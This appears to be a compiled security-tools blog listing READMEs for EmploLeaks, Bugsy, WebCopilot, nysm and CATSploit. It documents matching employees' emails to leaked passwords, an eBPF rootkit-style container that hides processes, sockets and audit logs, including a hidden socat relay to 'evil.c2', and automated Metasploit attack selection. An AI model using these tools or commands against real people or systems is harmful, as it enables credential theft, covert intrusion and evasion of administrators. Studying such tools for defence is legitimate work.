To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the cli folder:

cd cli
pip install -r requirements.txt

OSX

We know that there is a problem when installing the tool due to the psycopg2 binary. If you run into this problem, you can solve it by running:

cd cli
python3 -m pip install psycopg2-binary

Basic Usage

To use the tool, simply run the following command:

python3 cli/emploleaks.py

If everything went well during the installation, you will be able to start using EmploLeaks:

___________              .__         .__                 __
\_ _____/ _____ ______ | | ____ | | ____ _____ | | __ ______
| __)_ / \____ \| | / _ \| | _/ __ \__ \ | |/ / / ___/
| \ Y Y \ |_> > |_( <_> ) |_\ ___/ / __ \| < \___ \
/_______ /__|_| / __/|____/\____/|____/\___ >____ /__|_ \/____ >
\/ \/|__| \/ \/ \/ \/

OSINT tool to chain multiple APIs
emploleaks>

Right now, the tool supports two functionalities:

  • LinkedIn, for searching all employees of a company and getting their personal emails.
    • A GitLab extension, which is capable of finding personal code repositories of the employees.
  • If defined and connected, while the tool is gathering employee profiles, a search against a COMB database is made in order to retrieve leaked passwords.

Retrieving Linkedin Profiles

First, you must set the plugin to use, which in this case is linkedin. Afterwards, you should set your authentication tokens and then run the impersonate process:

emploleaks> use --plugin linkedin
emploleaks(linkedin)> setopt JSESSIONID
JSESSIONID:
[+] Updating value successfull
emploleaks(linkedin)> setopt li-at
li-at:
[+] Updating value successfull
emploleaks(linkedin)> show options
Module options:

Name Current Setting Required Description
---------- ----------------------------------- ---------- -----------------------------------
hide yes no hide the JSESSIONID field
JSESSIONID ************************** no active cookie session in browser #1
li-at AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG no active cookie session in browser #1
YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M
cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI
lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET
kyCyfN58SNNH
emploleaks(linkedin)> run impersonate
[+] Using cookies from the browser
Setting for first time JSESSIONID
Setting for first time li_at

li_at and JSESSIONID are the authentication cookies of your LinkedIn session in the browser. You can use the Web Developer Tools to get them: sign in normally to LinkedIn, right-click and choose Inspect; the cookies will be in the Storage tab.

Now that the module is configured, you can run it and start gathering information from the company:

Get Linkedin accounts + Leaked Passwords

We created a custom workflow where, with the information retrieved from LinkedIn, we try to match employees' personal emails to potential leaked passwords. In this case, you can connect to a database (in our case a custom indexed COMB database) using the connect command, as shown below:

emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4
[+] Connecting to the Leak Database...
[*] version: PostgreSQL 12.15

Once it's connected, you can run the workflow. With all the users gathered, the tool will search the database for leaked credentials affecting anyone:

Finally, the tool will generate console output with the following information:
  • A list of employees of the company (obtained from LinkedIn)
  • The social network profiles associated with each employee (obtained from email address)
  • A list of leaked passwords associated with each email address.

How to build the indexed COMB database

An important aspect of this project is the use of the indexed COMB database. To build your version, you need to download the torrent first. Be careful: the downloaded files plus the indexed version require at least 400 GB of available disk space.

Once the torrent has been completely downloaded, you will get a folder structure like the following:

β”œβ”€β”€ count_total.sh
β”œβ”€β”€ data
β”‚   β”œβ”€β”€ 0
β”‚   β”œβ”€β”€ 1
β”‚   β”‚   β”œβ”€β”€ 0
β”‚   β”‚   β”œβ”€β”€ 1
β”‚   β”‚   β”œβ”€β”€ 2
β”‚   β”‚   β”œβ”€β”€ 3
β”‚   β”‚   β”œβ”€β”€ 4
β”‚   β”‚   β”œβ”€β”€ 5
β”‚   β”‚   β”œβ”€β”€ 6
β”‚   β”‚   β”œβ”€β”€ 7
β”‚   β”‚   β”œβ”€β”€ 8
β”‚   β”‚   β”œβ”€β”€ 9
β”‚   β”‚   β”œβ”€β”€ a
β”‚   β”‚   β”œβ”€β”€ b
β”‚   β”‚   β”œβ”€β”€ c
β”‚   β”‚   β”œβ”€β”€ d
β”‚   β”‚   β”œβ”€β”€ e
β”‚   β”‚   β”œβ”€β”€ f
β”‚   β”‚   β”œβ”€β”€ g
β”‚   β”‚   β”œβ”€β”€ h
β”‚   β”‚   β”œβ”€β”€ i
β”‚   β”‚   β”œβ”€β”€ j
β”‚   β”‚   β”œβ”€β”€ k
β”‚   β”‚   β”œβ”€β”€ l
β”‚   β”‚   β”œβ”€β”€ m
β”‚   β”‚   β”œβ”€β”€ n
β”‚   β”‚   β”œβ”€β”€ o
β”‚   β”‚   β”œβ”€β”€ p
β”‚   β”‚   β”œβ”€β”€ q
β”‚   β”‚   β”œβ”€β”€ r
β”‚   β”‚   β”œβ”€β”€ s
β”‚   β”‚   β”œβ”€β”€ symbols
β”‚   β”‚   β”œβ”€β”€ t

At this point, you could import all those files with the command create_db:

The importer takes a lot of time, so we recommend running it with patience.
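
The payoff of the indexed layout is that a lookup only has to touch one small shard instead of the whole 400 GB. A rough sketch of the idea (a hypothetical helper, assuming email:password lines sharded by the first two characters of the email, as in the tree above):

# Sketch: look up one email in a COMB-style sharded folder.
from pathlib import Path

def lookup(comb_root: str, email: str) -> list[str]:
    # Shards are keyed by the first two characters of the email.
    c1, c2 = email[0].lower(), email[1].lower()
    shard = Path(comb_root) / "data" / c1 / c2
    hits = []
    for f in shard.rglob("*"):
        if f.is_file():
            with f.open(errors="ignore") as fh:
                hits += [line.strip() for line in fh if line.startswith(email + ":")]
    return hits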

Next Steps

We are integrating other public sites and applications that may offer information about leaked credentials. We may not be able to see the plaintext password, but it will give insight into whether the user has any compromised credentials:

  • Integration with Have I Been Pwned?
  • Integration with Firefox Monitor
  • Integration with Leak Check
  • Integration with BreachAlarm

Also, we will be focusing on gathering even more information from public sources of every employee. Do you have any idea in mind? Don't hesitate to reach us:

Or you can DM @pastacls or @gaaabifranco on Twitter.



Bugsy - Command-line Interface Tool That Provides Automatic Security Vulnerability Remediation For Your Code

By: Zion3R


Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.


What is Mobb?

Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.

What does Bugsy do?

Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).

Scan

  • Uses Checkmarx or Snyk CLI tools to run a SAST scan on a given open-source GitHub/GitLab repo
  • Analyzes the vulnerability report to identify issues that can be remediated automatically
  • Produces the code fixes and redirects the user to the fix report page on the Mobb platform

Analyze

  • Analyzes a Checkmarx/CodeQL/Fortify/Snyk vulnerability report to identify issues that can be remediated automatically
  • Produces the code fixes and redirects the user to the fix report page on the Mobb platform

Disclaimer

This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code itself; it uses findings detected by the SAST tools mentioned above.

Usage

You can simply run Bugsy from the command line, using npx:

npx mobbdev


WebCopilot - An Automation Tool That Enumerates Subdomains Then Filters Out Xss, Sqli, Open Redirect, Lfi, Ssrf And Rce Parameters And Then Scans For Vulnerabilities

By: Zion3R


WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.

The script first enumerates all the subdomains of the given target domain using assetfinder, sublister, subfinder, amass, findomain, hackertarget, riddler and crt, then does active subdomain enumeration using gobuster with a SecLists wordlist. It then filters out the live subdomains using dnsx, extracts the titles of the subdomains using httpx, and scans for subdomain takeover using subjack. Next, it uses gauplus & waybackurls to crawl all the endpoints of the given subdomains, uses gf patterns to filter out xss, lfi, ssrf, sqli, open redirect & rce parameters from those subdomains, and then scans for vulnerabilities on the subdomains using different open-source tools (like kxss, dalfox, openredirex, nuclei, etc). Finally, it prints out the results of the scan and saves all the output in a specified directory.


Features

Usage

g!2m0:~ webcopilot -h
             
──────▄▀▄─────▄▀▄
β”€β”€β”€β”€β”€β–„β–ˆβ–‘β–‘β–€β–€β–€β–€β–€β–‘β–‘β–ˆβ–„
β”€β–„β–„β”€β”€β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ”€β”€β–„β–„
β–ˆβ–„β–„β–ˆβ”€β–ˆβ–‘β–‘β–€β–‘β–‘β”¬β–‘β–‘β–€β–‘β–‘β–ˆβ”€β–ˆβ–„β–„β–ˆ
β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•
β–‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β–ˆβ–ˆβ•‘β–‘β–‘β•šβ•β•β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–‘β–ˆβ–ˆβ•”β•β•β•β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘β•šβ•β•β–‘β–‘β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•β–‘β–‘β•šβ•β•β•β•β• β–‘β•šβ•β•β•β•β•β–‘β•šβ•β•β–‘β–‘β–‘β–‘β–‘β•šβ•β•β•šβ•β•β•β•β•β•β•β–‘β•šβ•β•β•β•β•β–‘β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘
[●] @h4r5h1t.hrs | G!2m0

Usage:
webcopilot -d <target>
webcopilot -d <target> -s
webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains]

Flags:
-d Add your target [Requried]
-o To save outputs in folder [Default: domain.com]
-t Number of threads [Default: 100]
-b Add your server for BXSS [Default: False]
-x Exclude out of scope domains [Default: False]
-s Run only Subdomain Enumeration [Default: False]
-h Show this help message

Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss
Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server

Installing WebCopilot

WebCopilot requires git to install successfully. Run the following command as root to install webcopilot:

git clone https://github.com/h4r5h1t/webcopilot && cd webcopilot/ && chmod +x webcopilot install.sh && mv webcopilot /usr/bin/ && ./install.sh

Tools Used:

SubFinder β€’ Sublist3r β€’ Findomain β€’ gf β€’ OpenRedireX β€’ dnsx β€’ sqlmap β€’ gobuster β€’ assetfinder β€’ httpx β€’ kxss β€’ qsreplace β€’ Nuclei β€’ dalfox β€’ anew β€’ jq β€’ aquatone β€’ urldedupe β€’ Amass β€’ gauplus β€’ waybackurls β€’ crlfuzz

Running WebCopilot

To run the tool on a target, just use the following command.

g!2m0:~ webcopilot -d bugcrowd.com

The -o flag can be used to specify an output directory.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd

The -s flag can be used to run only subdomain enumeration (active + passive, also getting titles & screenshots).

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -s 

The -t flag can be used to add threads to your scan for faster results.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 

The -b flag can be used for blind XSS (OOB); you can get your server from xsshunter or interact.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -b testServer.xss

The -x flag can be used to exclude out-of-scope domains.

g!2m0:~ echo out.bugcrowd.com > excludeDomain.txt
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss

Example

The default options look like this:

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd
                                ──────▄▀▄─────▄▀▄
β”€β”€β”€β”€β”€β–„β–ˆβ–‘β–‘β–€β–€β–€β–€β–€β–‘β–‘β–ˆβ–„
β”€β–„β–„β”€β”€β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ”€β”€β–„β–„
β–ˆβ–„β–„β–ˆβ”€β–ˆβ–‘β–‘β–€β–‘β–‘β”¬β–‘β–‘β–€β–‘β–‘β–ˆβ”€β–ˆβ–„β–„β–ˆ
β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•
β–‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆ β–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β–ˆβ–ˆβ•‘β–‘β–‘β•šβ•β•β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–‘β–ˆβ–ˆβ•”β•β•β•β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘ β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘β•šβ•β•β–‘β–‘β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•β–‘β–‘β•šβ•β•β•β•β•β–‘β–‘β•šβ•β•β•β•β•β–‘β•šβ•β•β–‘β–‘β–‘ β–‘β•šβ•β•β•šβ•β•β•β•β•β•β•β–‘β•šβ•β•β•β•β•β–‘β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘
[●] @h4r5h1t.hrs | G!2m0


[❌] Warning: Use with caution. You are responsible for your own actions.
[❌] Developers assume no liability and are not responsible for any misuse or damage cause by this tool.


Target: bugcrowd.com
Output: /home/gizmo/targets/bugcrowd
Threads: 100
Server: False
Exclude: False
Mode: Running all Enumeration
Time: 30-08-2021 15:10:00

[!] Please wait while scanning...

[●] Subdoamin Scanning is in progress: Scanning subdomains of bugcrowd.com
[●] Subdoamin Scanned - [assetfinderβœ”] Subdomain Found: 34
[●] Subdoamin Scanned - [sublist3rβœ”] Subdomain Found: 29
[●] Subdoamin Scanned - [subfinderβœ”] Subdomain Found: 54
[●] Subdoamin Scanned - [amassβœ”] Subdomain Found: 43
[●] Subdoamin Scanned - [findomainβœ”] Subdomain Found: 27

[●] Active Subdoamin Scanning is in progress:
[!] Please be patient. This may take a while...
[●] Active Subdoamin Scanned - [gobusterβœ”] Subdomain Found: 11
[●] Active Subdoamin Scanned - [amassβœ”] Subdomain Found: 0

[●] Subdomain Scanning: Filtering out of scope subdomains
[●] Subdomain Scanning: Filtering Alive subdomains
[●] Subdomain Scanning: Getting titles of valid subdomains
[●] Visual inspection of Subdoamins is completed. Check: /subdomains/aquatone/

[●] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30

[●] Endpoints Scanning Completed for Subdomains of bugcrowd.com Total: 11032
[●] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of bugcrowd.com
[●] Vulnerabilities Scanned - [XSSβœ”] Found: 0
[●] Vulnerabilities Scanned - [SQLiβœ”] Found: 0
[●] Vulnerabilities Scanned - [LFIβœ”] Found: 0
[●] Vulnerabilities Scanned - [CRLFβœ”] Found: 0
[●] Vulnerabilities Scanned - [SSRFβœ”] Found: 0
[●] Vulnerabilities Scanned - [Sensitive Dataβœ”] Found: 0
[●] Vulnerabilities Scanned - [Open redirectβœ”] Found: 0
[●] Vulnerabilities Scanned - [Subdomain Takeoverβœ”] Found: 0
[●] Vulnerabilities Scanned - [Nuclieβœ”] Found: 0
[●] Vulnerabilities Scanning Completed for Subdomains of bugcrowd.com Check: /vulnerabilities/


β–’β–ˆβ–€β–€β–ˆ β–ˆβ–€β–€ β–ˆβ–€β–€ β–ˆβ–‘β–‘β–ˆ β–ˆβ–‘β–‘ β–€β–€β–ˆβ–€β–€
β–’β–ˆβ–„β–„β–€ β–ˆβ–€β–€ β–€β–€β–ˆ β–ˆβ–‘β–‘β–ˆ β–ˆβ–‘β–‘ β–‘β–‘β–ˆβ–‘β–‘
β–’β–ˆβ–‘β–’β–ˆ β–€β–€β–€ β–€β–€β–€ β–‘β–€β–€β–€ β–€β–€β–€ β–‘β–‘β–€β–‘β–‘

[+] Subdomains of bugcrowd.com
[+] Subdomains Found: 0
[+] Subdomains Alive: 0
[+] Endpoints: 11032
[+] XSS: 0
[+] SQLi: 0
[+] Open Redirect: 0
[+] SSRF: 0
[+] CRLF: 0
[+] LFI: 0
[+] Sensitive Data: 0
[+] Subdomain Takeover: 0
[+] Nuclei: 0

Acknowledgement

WebCopilot is inspired by Garud & Pinaak by ROX4R.

Thanks to the authors of the tools & wordlists used in this script.

@aboul3la @tomnomnom @lc @hahwul @projectdiscovery @maurosoria @shelld3v @devanshbatham @michenriksen @defparam @projectdiscovery @bp0lr @ameenmaali @sqlmapproject @dwisiswant0 @OWASP @OJ @Findomain @danielmiessler @1ndianl33t @ROX4R

Warning: Developers assume no liability and are not responsible for any misuse or damage caused by this tool. So, please use it with caution, because you are responsible for your own actions.


Nysm - A Stealth Post-Exploitation Container

By: Zion3R


A stealth post-exploitation container.

Introduction

With the rise in popularity of offensive tools based on eBPF, going from credential stealers to rootkits hiding their own PID, a question came to our mind: would it be possible to make eBPF invisible in its own eyes? From there, we created nysm, an eBPF stealth container meant to make offensive tools fly under the radar of system administrators, not only by hiding eBPF, but much more:

  • bpftool
  • bpflist-bpfcc
  • ps
  • top
  • sockstat
  • ss
  • rkhunter
  • chkrootkit
  • lsof
  • auditd
  • etc...

All these tools go blind to what goes through nysm. It hides:

  • New eBPF programs
  • New eBPF maps ️
  • New eBPF links ο”—
  • New Auditd generated logs ο“°
  • New PIDs οͺͺ
  • New sockets ο”Œ

Warning: This tool is a simple demonstration of eBPF capabilities. As such, it is not meant to be exhaustive. Nevertheless, pull requests are more than welcome.


Installation

Requirements

sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y

Linux headers

cd ./nysm/src/
bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

Build

cd ./nysm/src/
make

Usage

nysm is a simple program to run before the intended command:

Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.

-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message

Examples

Run a hidden bash:

./nysm bash

Run a hidden ssh and remove ./nysm:

./nysm -r ssh user@domain

Run a hidden socat as a daemon and remove ./nysm:

./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443

How it works

In general

As eBPF cannot overwrite returned values or kernel addresses, our goal is to find the lowest-level call interacting with a userspace address, overwrite its value, and hide the desired objects.

To differentiate nysm events from the others, everything runs inside a separate PID namespace.

Hide eBPF objects

bpftool has some features nysm wants to evade: bpftool prog list, bpftool map list and bpftool link list.

Like any eBPF program, bpftool uses the bpf() system call, and more specifically the BPF_PROG_GET_NEXT_ID, BPF_MAP_GET_NEXT_ID and BPF_LINK_GET_NEXT_ID commands. The result of these calls is stored in the userspace address pointed to by the attr argument.

To overwrite uattr, a tracepoint is set on the bpf() entry to store the pointed address in a map. Once done, it waits for the bpf() exit tracepoint. When bpf() exits, nysm can read and write through the bpf_attr structure. After each BPF_*_GET_NEXT_ID, bpf_attr.start_id is replaced by bpf_attr.next_id.

In order to hide specific IDs, it checks bpf_attr.next_id and replaces it with the next ID that was not created in nysm.

Program, map, and link IDs are collected from security_bpf_prog(), security_bpf_map(), and bpf_link_prime().

Hide Auditd logs

Auditd receives its logs from recvfrom() which stores its messages in a buffer.

If the message received was generated by a nysm process through audit_log_end(), it replaces the message length in its nlmsghdr header with 0.

Hide PIDS

Hiding PIDs with eBPF is nothing new. nysm hides new alloc_pid() PIDs from getdents64() in /proc by changing the length of the previous record.

As getdents64() requires looping through all its files, the eBPF instruction limit is easily reached. Therefore, nysm uses tail calls before reaching it.

Hide sockets

"Hiding sockets" is a big word. In fact, opened sockets are already hidden from many tools, as they cannot find the owning process in /proc. Nevertheless, ss uses socket() with the NETLINK_SOCK_DIAG flag, which returns all the currently opened sockets. After that, ss receives the result through recvmsg() in a message buffer, and the returned value is the length of all these messages combined.

Here, the same method as for the PIDs is applied: the length of the previous message is modified to hide nysm sockets.

These are collected from the connect() and bind() calls.

Limitations

Even with the best effort, nysm still has some limitations.

  • Every tool that does not close their file descriptors will spot nysm processes created while they are open. For example, if ./nysm bash is running before top, the processes will not show up. But, if another process is created from that bash instance while top is still running, the new process will be spotted. The same problem occurs with sockets and tools like nethogs.

  • Kernel logs: dmesg and /var/log/kern.log, the message nysm[<PID>] is installing a program with bpf_probe_write_user helper that may corrupt user memory! will pop several times because of the eBPF verifier on nysm run.

  • Many traces written into files are left as hooking read() and write() would be too heavy (but still possible). For example /proc/net/tcp or /sys/kernel/debug/tracing/enabled_functions.

  • Hiding ss recvmsg can be challenging, as a new socket can pop up at the beginning of the buffer, and nysm cannot hide it with a preceding record (this does not apply to PIDs). A quick fix could be to swap the first one with the next legitimate socket, but what if a socket is in the buffer by itself? Therefore, nysm modifies the first socket's information with hardcoded values.

  • Running bpf() with any kind of BPF_*_GET_NEXT_ID flag from a nysm child process should be avoided as it would hide every non-nysm eBPF objects.

Of course, many of these limitations must have their own solutions. Again, pull requests are more than welcome.



CATSploit - An Automated Penetration Testing Tool Using Cyber Attack Techniques Scoring

By: Zion3R


CATSploit is an automated penetration testing tool using the Cyber Attack Techniques Scoring (CATS) method that can be used without a pentester. Currently, pentesters implicitly make the selection of suitable attack techniques for the target systems. CATSploit uses system configuration information such as OS, open ports, and software versions collected by a scanner, and calculates score values for capture (eVc) and detectability (eVd) of each attack technique for the target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without hack knack (a professional pentester's skill).

CATSploit automatically performs penetration tests in the following sequence:

  1. Information gathering and prior information input. First, it gathers information on the target systems. CATSploit supports nmap and OpenVAS for gathering information on target systems. CATSploit also supports prior information on target systems if you have it.

  2. Calculating score values of attack techniques. Using the information obtained in the previous phase and the attack techniques database, evaluation values of capture (eVc) and detectability (eVd) of each attack technique are calculated. For each target computer, the values of each attack technique are calculated.

  3. Selection of attack techniques by using scores, and making an attack scenario. Attack techniques are selected and attack scenarios created according to pre-defined policies. For example, for a policy that prioritizes being hard to detect, the attack techniques with the lowest eVd (detectability score) will be selected (see the toy sketch after this list).

  4. Execution of attack scenario. CATSploit executes the attack techniques according to the attack scenario constructed in the previous phase. CATSploit uses Metasploit as a framework and the Metasploit API to execute actual attacks.
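
As a toy illustration of step 3 (hypothetical structures, not CATSploit's internals), a policy is just an ordering over the per-scenario scores:

# Toy illustration of policy-based selection over (eVc, eVd) scores.
# Values mimic the `scenario list` example further below.
scenarios = [
    {"id": "rmgrof", "eVc": 100.0, "eVd": 32.0},
    {"id": "joglhf", "eVc": 70.0,  "eVd": 60.0},
    {"id": "8jos4z", "eVc": 0.7,   "eVd": 72.8},
]

best_capture = max(scenarios, key=lambda s: s["eVc"])  # prioritize capture
best_stealth = min(scenarios, key=lambda s: s["eVd"])  # prioritize hard-to-detect
print(best_capture["id"], best_stealth["id"])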


Prerequisites

CATSploit has the following prerequisites:

  • Kali Linux 2023.2a

Installation

Metasploit, Nmap and OpenVAS are assumed to be installed with the Kali distribution.

Installing CATSploit

To install the latest version of CATSploit, please use the following commands:

Cloning and setup
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh

Editing configuration file

CATSploit is a server-client configuration, and the server reads the configuration JSON file at startup. In config.json, the following fields should be modified for your environment.

  • DBMS
    • dbname: database name created for CATSploit
    • user: username of PostgreSQL
    • password: password of PostgreSQL
    • host: If you are using a database on a remote host, specify the IP address of the host
  • SCENARIO
